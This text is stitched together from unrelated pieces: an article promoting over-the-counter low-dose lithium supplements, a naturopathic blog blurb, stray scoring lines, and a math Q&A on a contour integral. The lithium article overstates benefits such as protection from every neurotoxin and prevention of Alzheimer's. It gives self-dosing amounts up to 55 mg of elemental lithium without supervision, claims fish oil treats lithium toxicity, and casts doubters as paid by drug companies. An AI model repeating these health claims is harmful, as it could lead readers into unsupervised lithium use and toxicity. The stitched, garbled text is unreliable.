Some food sources of lithium to incorporate into your diet include kelp (1000-2000mg taken daily) and pistachios (just a handful, 2-3 times per week). Numerous studies have found that a common mineral heals the brain by stimulating the growth of new brain cells and protecting brain cells from every known neurotoxin. It has been shown to reduce the incidence of violent crime, homicide, suicide, and drug addiction, while preventing the brain shrinkage and memory loss that otherwise occurs naturally with age, as well as helping people with alcoholism, Alzheimer’s disease, depression, Parkinson’s disease, stroke, cluster headaches and traumatic brain injury. Although occurring naturally in tomatoes and in the water supply in many places, this mineral is rarely found in any vitamin-mineral supplement, and is not even commonly found in brick and mortar health food stores. Its name may surprise you: Lithium. Most people think of lithium as a drug for crazy people. While high doses of lithium carbonate are used to treat bipolar disorder, and are available only as a prescription, both lithium orotate and lithium aspartate are available cheaply over the counter, in much lower doses, at outlets such as vitacost.com and iherb.com. (Note: We have no financial connection with either outlet.) According to the controversial, and now deceased German orthomolecular physician Dr. Hans Nieper, the orotate form of lithium is more effectively transported inside cells, making it more effective at lower doses than the prescription form, lithium carbonate. Lithium has also been shown to be effective at ultra-low doses, such as those found naturally in tap water. A ten year Texas study found that the incidence of rape, homicide, suicide, burglary and drug addiction was significantly lower in counties where the water supply contained 70-170 micrograms of lithium per liter, compared to counties where there is little or no lithium in the water. A similar study in Japan found that lithium in the water supply significantly reduced the risk of suicide. Even a very thirsty Texan who drank three liters of water a day (100 ounces) would still be getting only a half a milligram of lithium per day, if they lived in an area where there is 170 mcg. of lithium per liter of water. Compare this to the amount commonly taken by bipolar patients: 900 mg/day of lithium carbonate, which contains 165 mg of elemental lithium. Put another way, the startling results of the Texas study were achieved with doses that were one-third of one percent of the amount taken by bipolar patients. These highly beneficial effects from low dose lithium have prompted some researchers to call for adding lithium to the water supply in the amounts found naturally in the high lithium Texas counties. One of these is Jonathan Wright M.D, author, founder of the Tahoma Clinic in Renton, Washington, and a member of the medical advisory board for the non-profit Life Extension Foundation. Dr. Wright first began working with lithium in the 70s, when research at a VA hospital showed that it dramatically reduced recidivism (otherwise known as “falling off the wagon”) among alcoholics. Not only were these vets drinking less, their families reported less anger, aggression and violence in the men, and less moodiness, weepiness and depression in the women. They were also sleeping better, and generally calmer and happier. Wright later began using low dose lithium with the children of alcoholics, who often have some of the same mood problems afflicting their parents. (A February 2010 article published in the journal Addiction showed that kids with a family history of alcoholism are more likely to crave sweets, suffer from depression, and become alcoholics themselves.) But Wright didn’t start using low dose lithium himself until 1999, when an article in the British medical journal The Lancet reported the astonishing finding that just four weeks of high-dose lithium therapy caused a three percent increase in brain volume — translating into billions of additional brain cells. These findings turned on its head the conventional wisdom that we are born with all the brain cells we will ever have, and that brain shrinkage is an unavoidable consequence of aging. In the past ten years, says Wright, there has been an “avalanche of research” about lithium. In addition to proving definitively that lithium stimulates the brain to grow new cells, it has also been shown to be, Wright says, a “wonderful neuroprotective agent from any type of toxin there is.” This neuro-protective mechanism is so strong that one respected lithium researcher said, according to Wright, that it “verges on malpractice to prescribe any psychotropic medication without lithium to protect the brain.” Psychotropics include antidepressants, anti-anxiety meds, and sleeping pills. Dr. Wright has even heard, anecdotally, from numerous patients, that when they are taking lithium they don’t get bad hangovers. Lithium protects the brain from the damaging effects of alcohol, reducing the pain the morning after. Wright cautions that one can’t simply pop a tablet of lithium along with a pitcher of margaritas to achieve this effect, one would have to be taking it regularly, prior to a night of overindulgence, to protect brain cells. Likewise, it has been shown that if the blood supply is suddenly cut off to the brain, such as with a stroke, brain cells suffer much less damage if the stroke victim has been taking lithium. (It does not work to take the lithium after the stroke, when the damage has already occurred.) Mentioning that a recent medical journal carried a story with the headline “Can lithium prevent Alzheimer’s disease?” Dr. Wright said, “You know when you see a headline like that, that in another ten years you’ll see the same headline without the question mark.” He then enumerated multiple ways in which lithium interferes with the Alzheimer’s disease process. Although he has no family history of mental illness or alcoholism, Wright has been taking 20 mg/day of elemental lithium (in the orotate form) for over ten years, purely to protect his brain and keep his IQ and memory in tip-top form, for as long as possible, as he ages. In over 30 years, Wright has encountered only two or three people who have had a possible reaction to a dose of 20 mg/day or less: they thought it might have caused a slight tremor — which went away when the lithium was discontinued. On the other hand, he’s had dozens of patients report that their benign tremor improved on low dose lithium Wright cautions that every patient is different and it is wise to also take fish oil and flax seed oil, if one is taking lithium. These healthy oils are routinely used to treat lithium toxicity in patients who are so severely bipolar that stopping their lithium is not an option, and they add an extra layer of safety for those using over the counter lithium without a doctor’s supervision. Wright defines low dose lithium as anything up to a maximum of 55 mg of elemental lithium per day, which is the equivalent of a single 300 mg. capsule of prescription lithium carbonate, or 11 tablets of over the counter lithium orotate or aspartate, which typically contain 5 mg. of elemental lithium per tablet. No one, he says, should consider going higher than that without regular blood testing to insure that they are not toxic, and damaging either their kidneys or thyroid gland. Symptoms of lithium toxicity are: tremor in the hands, rising blood pressure, and flu-like symptoms. Given the many amazing neurological benefits of lithium, why has there been so little it in the press? A search at nytimes.com for “lithium alcoholism” brought up just two relevant articles: from 1973 and 1975. A search for “lithium Alzheimer’s” at both MSNBC and CNN brought up no relevant articles. Dr. Wright has a theory about this, and it’s not flattering to either science writers, pharmaceutical companies or biosciences academics. The problem begins, he says, with the fact that lithium cannot be patented, so no real money can be made from selling it. Thus, there are no armies of press agents blanketing science writers with press releases touting its eye-popping benefits. And science writers, Dr. Wright says, “do not dig, and they have not been digging into this lithium at all.” If they don’t receive a press release about it, says Wright, science writers are unlikely to find out about new discoveries. Not only is there no money to be made selling lithium, lithium represents direct competition to drugs that are currently earning many billions of profit for pharmaceutical companies. The central nervous system (CNS) drug market is expected to increase to $64 billion this year. By comparison, lithium aspartate is available at vitacost.com for less than $6 for a 30 day supply. I asked Dr. Wright “If everyone were taking low dose lithium, as you are, wouldn’t there be a greatly reduced market for psychotropic drugs, Alzheimer’s drugs, alcoholism drugs?” and he replied: “Yes. I don’t know when the news about lithium will break through into public awareness. When it does, it will probably be opposed, because there are so many professors who are on the payroll of patent medicine companies. Anybody who comes out and promotes something that is in competition with a product from the patent medicine companies is going to be called crazy and a quack by those on the payroll of those same patent medicine companies.” The news that lithium is good for our brains raises some compelling questions. Is lithium an essential nutrient for human health that is deficient in our water supply and the soil that grows our food? With so many people now filtering their water or drinking purified bottled water, are we eliminating even trace amounts of lithium from our diets? Lithium is one of the most abundant minerals in the sea, with 50 micrograms in a tablespoon of seawater. Could that be part of the reason why people the world over flock to the sea, and feel so relaxed and calm after a day spent splashing in the waves? Until these questions are answered, one thing seems clear: your brain has a good friend in lithium. Sheila Casey is a DC based journalist. Her work has appeared in The Denver Post, Reuters, Chicago Sun-Times, Dissident Voice and Common Dreams. A new study was just published in the Archives of General Psychiatry involving over 73,000 patients that points to the connection between inflammation in the body and depression. I identified this connection nearly 10 years ago, began publishing on it about six years ago, and coined the phrase “Sickness Syndrome” to help doctors to diagnose this prevalent cause for depression. I have been treating patients using this knowledge ever since. It is time to take a new look at the underlying cause(s) of depression so that mainstream medicine can offer long lasting cures for this debilitating health challenge. Welcome to the Dr. Gina Blog Every day, licensed Naturopathic Medical Doctors are exposed to news, information, and research that affects the health and well-being of patients, friends and family. Each day more information is released on natural medicine, prevention and health. The hope is that you enjoy the information and find value in the shared thoughts and personal experiences about health and vitality, the planet and the power of natural medicine. Feel free to chime in with comments and experiences of your own.
High
[ 0.660869565217391, 28.5, 14.625 ]
Q: Show that $\int_{|z|=1}(z+1/z)^{2m+1}dz = 2\pi i {2m+1 \choose m}$ Show that $$ \int_{|z|=1}(z+1/z)^{2m+1}dz = 2\pi i {2m+1 \choose m} $$ , for any nonnegative integer m. I can't solve this problem.. I tried to find singularities but failed. $(z+1/z)$ is not familiar to me. Is there anyone to help? A: Due to binomial theorem, $$(z+\frac{1}{z})^{2m+1}=\frac{(z^2+1)^{2m+1}}{z^{2m+1}}=\frac{\sum_{k=0}^{2m+1}{2m+1 \choose k}z^{2k}}{z^{2m+1}}=\sum_{k=0}^{2m+1}{2m+1 \choose k}z^{2k-2m-1}.\tag{1}$$ By Cauchy's integral formula or direct calculation with $z=e^{it}$ for $|z|=1$, $$\int_{|z|=1}z^ndz = \left\{\begin{array}{cc} 2\pi i& n={-1}\\0 &n\ne{-1} \end{array}\right..\tag{2}$$ The conclusion follows from $(1)$ and $(2)$.
High
[ 0.7012987012987011, 30.375, 12.9375 ]